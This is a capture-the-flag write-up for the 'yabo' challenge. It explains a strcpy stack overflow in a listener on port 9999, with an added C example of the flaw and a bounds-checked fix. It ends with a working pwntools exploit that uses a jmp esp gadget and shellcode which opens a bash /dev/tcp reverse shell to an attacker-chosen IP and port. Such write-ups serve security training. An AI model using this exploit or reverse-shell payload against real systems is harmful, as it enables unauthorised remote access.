# yabo

## Files

{% embed url="https://github.com/0xTen/CTFs/tree/main/hacktivitycon/2021/yabo" %}

## The binary

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5MZ1rNUa5C5-YXFA3%2Fimage.png?alt=media\&token=9d410273-910a-4f49-a341-bdec198af534)

The binary starts a listener on port 9999 and waits for input.

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5NCuPVZARVbhXC-59%2Fimage.png?alt=media\&token=232d5467-1bfe-4342-9f95-0f96861b7cbb)

## Buffer Overflow

The program copies the input into a 1024-byte buffer with `strcpy` and thus has a stack buffer overflow vulnerability.

![](https://630407063-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MZD3WIm997ouoGhrdss%2F-Mk5GtJlwXf2zll6rUPa%2F-Mk5O321my3XpaHrAUwf%2Fimage.png?alt=media\&token=f94284e1-c15a-4487-a0e5-83d4f22b2473)
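The flaw described above, as an added example that is not the challenge's source (the page only shows it as a screenshot): a reconstructed `strcpy()` handler next to a hardened form that bounds the copy by the destination size and refuses input that does not fit, instead of silently truncating it. The function names, the request-length interface and the test helper are assumptions.

```c
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024   /* same size as the buffer in the write-up */

/* Reconstructed shape of the flaw (not the challenge's actual source):
 * strcpy() has no bound, so a request of BUF_SIZE bytes or more runs past
 * the buffer into the saved frame pointer and return address. Shown for
 * comparison only; nothing below calls it. */
void handle_request_vulnerable(const char *request)
{
    char buf[BUF_SIZE];
    strcpy(buf, request);
    (void)buf;
}

/* Hardened form: the caller passes the received length, the copy is bounded
 * by the destination, and input that does not fit (with its NUL) is refused
 * rather than silently truncated. Returns 0 on success, -1 on rejection. */
int handle_request_safe(const char *request, size_t request_len)
{
    char buf[BUF_SIZE];

    if (request == NULL || request_len >= sizeof buf)
        return -1;                       /* 1024+ bytes would overflow */

    memcpy(buf, request, request_len);
    buf[request_len] = '\0';             /* explicit terminator */
    return 0;
}

/* Exercise the check with a constructed request of n 'A' bytes (the
 * write-up's padding is 1044 of them). Returns handle_request_safe's
 * result, or -2 if the test buffer could not be allocated. */
int accepts_request_of_length(size_t n)
{
    int rc;
    char *request = malloc(n + 1);
    if (request == NULL)
        return -2;
    memset(request, 'A', n);
    request[n] = '\0';
    rc = handle_request_safe(request, n);
    free(request);
    return rc;
}
```

A request of 1023 bytes is the longest the hardened handler accepts; the 1044-byte padding used later on this page is rejected before any copy happens.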

We can use a `jmp esp` gadget to jump to our shellcode on the stack and run it.

I used the following shellcode:

{% embed url="https://www.exploit-db.com/exploits/40924" %}

A simple /bin/sh shellcode wouldn't work, since the remote process that receives the input is a fork: the shell would be popped on the server but wouldn't receive input through the socket. With the shellcode I used, exploiting is as easy as appending the desired command to the shellcode, so I used a bash + /dev/tcp shell.

## Final Exploit

```python
#!/usr/bin/env python
# Python 2 script: the payload is built as a str and pwntools sends it as raw bytes.
from pwn import *

e = context.binary = ELF('./YABO', checksec=False)   # sets the 32-bit target context

if args.REMOTE:
    io = remote('challenge.ctf.games', 32762)
else:
    io = remote('127.0.0.1', 9999)

# pwntools removes its own flags (such as REMOTE) from sys.argv, so the
# listener address for the reverse shell is whatever follows them.
ip = sys.argv[1]
port = sys.argv[2]

buf = 1044*'A'          # padding: fills the 1024-byte buffer up to the saved return address
buf += p32(0x80492e2)   # jmp esp gadget: returns into the stack, where the shellcode follows
# shellcode from the exploit-db entry above, with the bash /dev/tcp command appended
buf += "\x31\xc0\x31\xd2\xb0\x0b\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x62\x61\x73\x68\x20\x2d\x63\x20\x22\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f" + ip + "\x2f" + port + "\x20\x30\x3e\x26\x31\x22"

io.sendline(buf)
io.interactive()
```
